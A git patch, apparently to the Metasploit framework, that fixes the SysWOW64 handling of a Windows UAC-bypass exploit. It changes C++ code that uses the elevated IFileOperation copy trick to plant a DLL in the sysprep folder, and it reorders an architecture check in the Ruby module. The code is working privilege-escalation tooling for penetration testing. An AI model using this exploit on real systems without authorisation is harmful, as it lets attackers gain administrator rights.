From dfac7b57d26ee8560b5fd95b345de7ee7f08a79e Mon Sep 17 00:00:00 2001 From: Meatballs Date: Fri, 27 Sep 2013 09:10:49 +0100 Subject: [PATCH] Fixup SysWOW64 --- .../bypassuac_injection/dll/src/Exploit.cpp | 5 +++-- .../exploits/windows/local/bypassuac_injection.rb | 14 +++++++------- 2 files changed, 10 insertions(+), 9 deletions(-) diff --git a/external/source/exploits/bypassuac_injection/dll/src/Exploit.cpp b/external/source/exploits/bypassuac_injection/dll/src/Exploit.cpp index d898a1f501..8ab69288fa 100644 --- a/external/source/exploits/bypassuac_injection/dll/src/Exploit.cpp +++ b/external/source/exploits/bypassuac_injection/dll/src/Exploit.cpp @@ -25,6 +25,8 @@ void exploit() const IID *pIID_EIFOClass = &__uuidof(FileOperation); const IID *pIID_ShellItem2 = &__uuidof(IShellItem2); + Wow64DisableWow64FsRedirection(&OldValue); + GetWindowsDirectoryW(windir, MAX_PATH); GetTempPathW(MAX_PATH, path); @@ -44,8 +46,7 @@ void exploit() wcscat_s(szElevExeFull, MAX_PATH, sySysPrepExe); if (CoInitialize(NULL) == S_OK) - { - //Wow64DisableWow64FsRedirection(&OldValue); + { if (CoCreateInstance(*pIID_EIFOClass, NULL, CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_SERVER | CLSCTX_INPROC_HANDLER, *pIID_EIFO, (void**) &pFileOp) == S_OK) { if (pFileOp->SetOperationFlags(FOF_NOCONFIRMATION | FOF_NOERRORUI | FOF_SILENT | FOFX_SHOWELEVATIONPROMPT | FOFX_NOCOPYHOOKS | FOFX_REQUIREELEVATION) == S_OK) diff --git a/modules/exploits/windows/local/bypassuac_injection.rb b/modules/exploits/windows/local/bypassuac_injection.rb index 906e980e62..988ee8456d 100644 --- a/modules/exploits/windows/local/bypassuac_injection.rb +++ b/modules/exploits/windows/local/bypassuac_injection.rb @@ -120,6 +120,13 @@ class Metasploit3 < Msf::Exploit::Local # decide, x86 or x64 sysarch = sysinfo["Architecture"] if sysarch =~ /x64/i + unless target_arch.first == 'x86_64' + fail_with( + Exploit::Failure::BadConfig, + "x86 Target Selected for x64 System" + ) + end + bpdll_path = ::File.join(path, "bypassuac-x64.dll") if sysarch =~ /WOW64/i @@ -129,13 +136,6 @@ class Metasploit3 < Msf::Exploit::Local # SysWOW64 Redirection... register_files_for_cleanup("#{windir}\\System32\\sysprep\\CRYPTBASE.dll") end - - unless target_arch.first == 'x86_64' - fail_with( - Exploit::Failure::BadConfig, - "x86 Target Selected for x64 System" - ) - end else if target_arch.first =~ /x64/i fail_with(